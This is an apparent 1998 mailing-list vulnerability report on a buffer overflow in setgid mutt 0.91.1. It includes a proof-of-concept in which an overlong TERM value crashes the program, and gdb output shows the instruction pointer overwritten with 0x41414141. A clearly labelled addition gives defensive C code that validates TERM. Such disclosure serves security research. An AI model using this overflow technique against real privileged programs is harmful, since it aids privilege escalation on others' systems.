mutt buffer overflow?

From: funkySh (jn1at_private)
Date: Thu Oct 22 1998 - 00:24:51 PDT


    Sorry if this is already known..
    
    There have been some posts about the buffer overflow in mutt
    (by sending a specially formatted Content-Type); here is another
    one (I think exploitable) in mutt 0.91.1-2 shipped with
    RH 5.1 with setgid mail
    
    [orbital@PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
    [orbital@PulpFiction /]$ mutt
    Segmentation fault
    [orbital@PulpFiction /]$ gdb /usr/bin/mutt
    ...
    (gdb) r
    Starting program: /usr/bin/mutt
    
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    
    Mutt 0.91.1-5 still has the same problem but setgid mail is turned off..
    
    
    
    
    
    --
    funkySh                                        jn1at_private
    PGP keyID: 768/D837F9A1
    fingerprint  36 78 A6 D7 55 38 12 51  05 93 36 65 A0 6E 6D 22
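
The post does not say which code overflows. As an added example (not from the original post and not mutt's code), here is one defensive check a setgid program could apply to TERM before handing it to a terminal library; `copy_term_name`, `TERM_NAME_MAX` and the allowed character set are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TERM_NAME_MAX 64  /* assumed limit; real terminal names are far shorter */

/* Hypothetical helper: copy a TERM value into out only if it is short and
 * made of characters that occur in terminal names. Returns 0 on success,
 * -1 if the value is rejected (out is then left as the empty string). */
int copy_term_name(const char *value, char *out, size_t outlen)
{
    size_t len, i;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (value == NULL)
        return -1;

    /* Bounded length scan: never reads more than TERM_NAME_MAX + 1 bytes. */
    for (len = 0; len <= TERM_NAME_MAX && value[len] != '\0'; len++)
        ;
    if (len == 0 || len > TERM_NAME_MAX || len >= outlen)
        return -1;              /* empty, overlong, or would not fit */

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '-' && c != '_' && c != '+' && c != '.')
            return -1;          /* unexpected character */
    }
    memcpy(out, value, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char term[TERM_NAME_MAX + 1];
    const char *use = term;

    /* Fall back to a fixed name rather than trusting a rejected value. */
    if (copy_term_name(getenv("TERM"), term, sizeof term) != 0) {
        fputs("TERM rejected, using \"dumb\"\n", stderr);
        use = "dumb";
    }
    printf("terminal type: %s\n", use);  /* only now initialise the terminal library */
    return 0;
}
```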
    


